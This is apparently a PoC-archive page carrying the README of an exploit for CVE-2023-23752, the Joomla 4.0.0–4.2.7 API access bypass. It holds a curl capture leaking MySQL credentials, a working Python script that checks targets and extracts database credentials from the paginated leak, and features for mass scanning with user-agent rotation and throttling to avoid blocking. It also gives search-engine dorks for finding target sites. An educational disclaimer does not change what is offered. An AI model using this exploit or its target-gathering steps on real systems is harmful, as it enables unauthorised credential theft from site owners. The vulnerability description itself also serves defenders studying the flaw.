Related vulnerability
Title:
Joomla security vulnerability
(CVE-2023-23752)
Description: Joomla is an open-source, cross-platform content management system (CMS) written in PHP and MySQL by the US team Open Source Matters. Joomla versions 4.0.0 through 4.2.7 contain a security vulnerability caused by an improper access check, which allows unauthorized access to web service endpoints.
Description
Exploit for CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7).
Introduction
# CVE-2023-23752
Exploit for CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7).
## Introduction
CVE-2023-23752 is an authentication bypass in the Joomla! web services API that results in an information leak: appending `public=true` to the query string of an `/api/index.php/v1/...` request skips the API's access check, so an unauthenticated client can read endpoints that should require a token. Most of the public exploits use the bypass on `v1/config/application`, which returns the site configuration and, within it, the Joomla! MySQL database credentials in plaintext. The following demonstrates the leak:
```bash
$ curl -v http://10.9.49.205/api/index.php/v1/config/application?public=true
* Trying 10.9.49.205:80...
* TCP_NODELAY set
* Connected to 10.9.49.205 (10.9.49.205) port 80 (#0)
> GET /api/index.php/v1/config/application?public=true HTTP/1.1
> Host: 10.9.49.205
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 20 Mar 2023 15:14:05 GMT
< Server: Apache/2.4.41 (Ubuntu)
< x-frame-options: SAMEORIGIN
< referrer-policy: strict-origin-when-cross-origin
< cross-origin-opener-policy: same-origin
< X-Powered-By: JoomlaAPI/1.0
< Expires: Wed, 17 Aug 2005 00:00:00 GMT
< Last-Modified: Mon, 20 Mar 2023 15:14:05 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Content-Length: 1983
< Content-Type: application/vnd.api+json; charset=utf-8
<
{"links":{"self":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true","next":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20","last":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20"},"data":[{"type":"application","id":"224","attributes":{"offline":false,"id":224}},{"type":"application","id":"224","attributes":{"offline_message":"This site is down for maintenance.<br>Please check back again soon.","id":224}},{"type":"application","id":"224","attributes":{"display_offline_message":1,"id":224}},{"type":"application","id":"224","attributes":{"offline_image":"","id":224}},{"type":"application","id":"224","attributes":{"sitename":"vulncheck","id":224}},{"type":"application","id":"224","attributes":{"editor":"tinymce","id":224}},{"type":"application","id":"224","attributes":{"captcha":"0","id":224}},{"type":"application","id":"224","attributes":{"list_limit":20,"id":224}},{"type":"application","id":"224","attributes":{"access":1,"id":224}},{"type":"application","id":"224","attributes":{"debug":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang_const":true,"id":224}},{"type":"application","id":"224","attributes":{"dbtype":"mysqli","id":224}},{"type":"application","id":"224","attributes":{"host":"localhost","id":224}},{"type":"application","id":"224","attributes":{"user":"root","id":224}},{"type":"application","id":"224","attributes":{"password":"labpass1","id":224}},{"type":"application","id":"224","attributes":{"db":"joomla_db","id":224}},{"type":"application","id":"224","attributes":{"dbprefix":"xj3n0_","id":224}},{"type":"application","id":"224","attributes":{"dbencryption":0,"id":224}},{"type":"application","id":"224","attributes":{"dbsslverifyservercert":false,"id":224}}],"meta":{"total-pages":4}}
* Connection #0 to host 10.9.49.205 left intact
```
In the proof of concept above the server responds with the credentials root:labpass1, the MySQL account of the test Joomla! install. That test MySQL server was bound to 127.0.0.1, so a remote attacker cannot connect to it and the credentials by themselves are of limited use; binding MySQL to localhost is the most common configuration and severely limits this credential leak. The leak is still not harmless: the response also exposes `dbprefix`, the database user and `sitename`, which feed follow-on attacks, database passwords are often reused for the Joomla! administrator account, and the same bypass works against other API endpoints such as `v1/users?public=true`, which lists account names. The check is fixed in Joomla! 4.2.8; a patched server rejects the unauthenticated request instead of returning configuration data.
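The request above and the handling of its response, written out as an added example (it is neither the repository's `joomla.py` nor VulnCheck's code): a target-list line is normalised into the `public=true` config URL, a 200 answer with the `application/vnd.api+json` content type is treated as the vulnerable signature, `links.next` is followed because the leak is paginated (20 attributes a page, `total-pages` 4 in the capture), and the one-attribute-per-item `data` array is flattened into a single configuration dict. The `fetch` callable is injected: `requests_fetch` is the live one, and `fake_fetch` serves constructed responses modelled on the capture so the code runs offline. The host `patched.test`, its 401 body and the two sample pages are constructed for the example.

```python
"""Added example (not the repository's joomla.py): check one Joomla target for
CVE-2023-23752 and extract the database settings from the leaked configuration.
Network access goes through a fetch(url) -> (status, content_type, body) callable
so the same logic runs offline against constructed responses."""
import json
from urllib.parse import urlsplit, urlunsplit

API_PATH = "/api/index.php/v1/config/application"
DB_KEYS = ("dbtype", "host", "user", "password", "db", "dbprefix")

def build_api_url(target):
    """Normalise a target-list line ("host", "host/sub/", full http(s) URL)
    into the config endpoint URL; reject anything else (input validation)."""
    target = target.strip()
    if "://" not in target:
        target = "http://" + target
    parts = urlsplit(target)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError("not an http(s) target: %r" % target)
    # A Joomla install in a sub-directory keeps its path; trailing slash dropped.
    return urlunsplit((parts.scheme, parts.netloc,
                       parts.path.rstrip("/") + API_PATH, "public=true", ""))

def parse_leak_page(body):
    """Flatten one JSON:API page into {attribute: value} and return links.next.
    Each `data` element carries one configuration attribute plus the row id."""
    doc = json.loads(body)
    attrs = {}
    for item in doc.get("data", []):
        if item.get("type") == "application":
            attrs.update((k, v) for k, v in item.get("attributes", {}).items()
                         if k != "id")
    return attrs, doc.get("links", {}).get("next")

def leak_config(target, fetch, max_pages=10):
    """Return the merged leaked configuration, or None if not vulnerable.
    Vulnerable servers answer the unauthenticated request with 200 and
    application/vnd.api+json; patched ones reject it. The leak is paginated
    (20 attributes a page), so links.next is followed, with a bound."""
    url = build_api_url(target)
    merged = {}
    for _ in range(max_pages):
        status, content_type, body = fetch(url)
        if status != 200 or "vnd.api+json" not in content_type:
            return None
        attrs, next_url = parse_leak_page(body)
        merged.update(attrs)
        if not next_url:
            break
        url = next_url
    return merged or None

def db_credentials(config):
    """Pick the MySQL fields out of the leaked configuration."""
    return {k: config[k] for k in DB_KEYS if k in config}

def requests_fetch(url, timeout=10.0):
    """Live fetcher; `requests` is assumed installed. Redirects are not
    followed so a bounce to a login page cannot be mistaken for a hit."""
    import requests
    r = requests.get(url, timeout=timeout, allow_redirects=False)
    return r.status_code, r.headers.get("Content-Type", ""), r.text

# Constructed responses modelled on the capture above: two pages of the
# paginated leak from the lab host, and a 401 from a hypothetical patched host.
_VULN = "http://10.9.49.205" + API_PATH + "?public=true"
_VULN_P2 = _VULN + "&page%5Boffset%5D=20&page%5Blimit%5D=20"
_API = "application/vnd.api+json; charset=utf-8"

def _item(key, value):
    return {"type": "application", "id": "224", "attributes": {key: value, "id": 224}}

SAMPLE_RESPONSES = {
    _VULN: (200, _API, json.dumps({
        "links": {"self": _VULN, "next": _VULN_P2},
        "data": [_item("offline", False), _item("sitename", "vulncheck"),
                 _item("dbtype", "mysqli"), _item("host", "localhost")],
        "meta": {"total-pages": 2}})),
    _VULN_P2: (200, _API, json.dumps({
        "links": {"self": _VULN_P2},
        "data": [_item("user", "root"), _item("password", "labpass1"),
                 _item("db", "joomla_db"), _item("dbprefix", "xj3n0_")],
        "meta": {"total-pages": 2}})),
    "http://patched.test" + API_PATH + "?public=true":
        (401, _API, '{"errors":[{"title":"Unauthorized"}]}'),
}

def fake_fetch(url):
    """Offline stand-in for requests_fetch; unknown URLs look like a 404."""
    return SAMPLE_RESPONSES.get(url, (404, "text/html", ""))

if __name__ == "__main__":
    for host in ("10.9.49.205", "patched.test"):
        cfg = leak_config(host, fake_fetch)
        print(host, "->", db_credentials(cfg) if cfg else "not vulnerable")
```

Against a live target, pass `requests_fetch` instead of `fake_fetch`. The status and content-type gate matters for mass scanning: a site that serves a 200 HTML page for every path would otherwise be counted as a hit, and the page bound on `links.next` keeps a hostile server from leading the scanner in circles.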
## Disclaimer: Educational Purpose Only
This Exploit and Proof of Concept (PoC) is presented solely for educational and informational purposes. The intent behind sharing this is to demonstrate potential vulnerabilities in a controlled environment. The goal is to promote understanding of cybersecurity concepts and encourage responsible disclosure.
### Important Points:
- **Ethical Use:** This Exploit and PoC should only be used in environments and systems where you have explicit authorization. Unauthorized access to computer systems is illegal and unethical.
- **Responsible Disclosure:** If you discover vulnerabilities as a result of this Exploit and PoC, it is strongly recommended to report them responsibly to the relevant parties, allowing them adequate time to address and mitigate the issues.
- **No Endorsement:** This PoC and related materials do not endorse or encourage any form of unauthorized access, hacking, or any other illegal activities.
By accessing and using this Exploit and PoC, you acknowledge that you are solely responsible for your actions and agree to use this information in compliance with applicable laws and regulations. The author assumes no liability for any misuse or consequences arising from the use of this PoC for any purpose other than education and responsible disclosure.
## Exploit Features
- **SINGLE SCAN:** Scan a single site for the vulnerability.
- **MASS SCAN:** Scan a list of sites read from a file.
- **ASYNCHRONOUS Threading:** Uses threads so that many targets are checked concurrently.
- **DYNAMIC THROTTLING:** Dynamic request throttling slows the sending rate so that too many requests are not sent in a short time, which helps avoid being blocked.
- **RESULT SUMMARISATION:** Summarises the findings at the end of the scan: successful scans, unsuccessful scans, and any errors encountered.
- **INPUT VALIDATION:** Validates user input, in particular lines read from files, so that only correctly formed, legitimate URLs are scanned.
- **USER-AGENT ROTATION:** Rotates the User-Agent header on each request to mimic different browsers and reduce the chance of being blocked.
## Getting Started
### Prerequisites
- Python 3.x
- Required Python packages: `requests`, `colorama`, `urllib3`, `fake_useragent`, `aiohttp` (the PyPI package name; listed as `aio-http` in the original README)
### Installation
1. Clone the repository:
```bash
git clone https://github.com/Pushkarup/CVE-2023-23752.git
cd CVE-2023-23752
```
2. Install the required Python packages:
```bash
pip install -r requirements.txt
```
## Usage
1. Create a text file containing the target sites (one per line) and save it with a `.txt` extension.
- Collect a site list for testing with search-engine dorks such as:
  - `inurl:/api/index.php/v1/config/application?public=true`
  - `intitle:"Index of" /api/index.php/v1/config/application?public=true`
  - `filetype:php inurl:/api/index.php/v1/config/application?public=true`
  - `intitle:"Index of" AND intext:"config" AND intext:"application" AND intext:"public=true"`
2. Run the script:
```bash
python joomla.py
```
3. Let the script run and follow its prompts.
4. Every site found vulnerable is written to `Results.txt`.
## Contributing
Contributions are welcome! If you find any issues or have improvements, feel free to open a pull request or create an issue.
## License
This project is licensed under the [MIT License](LICENSE).
## Contact
- GitHub: [Pushkar Upadhyay](https://github.com/Pushkarup)
- LinkedIn: [Pushkar Upadhyay](www.linkedin.com/in/pushkar-upadhyay-24p)
## Donations
### Show your support
- BTC: 3QqVBBzDBezA9U77PCTwMPQVGb1eecv2SP
- ETH: 0xB779767483831BD98327A449C78FfccE2cc6df0a
- USDT: 0xB779767483831BD98327A449C78FfccE2cc6df0a
File snapshot
[4.0K] /data/pocs/22553cdb0327e36fa3c965c1e4fa86b129df2fb8
├── [5.4K] joomla.py
├── [1.0K] LICENSE
├── [7.3K] README.md
└── [ 74] requirements.txt
0 directories, 4 files
Notes
1. Prefer accessing the POC through its original source.
2. If the source is gone or unreachable, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.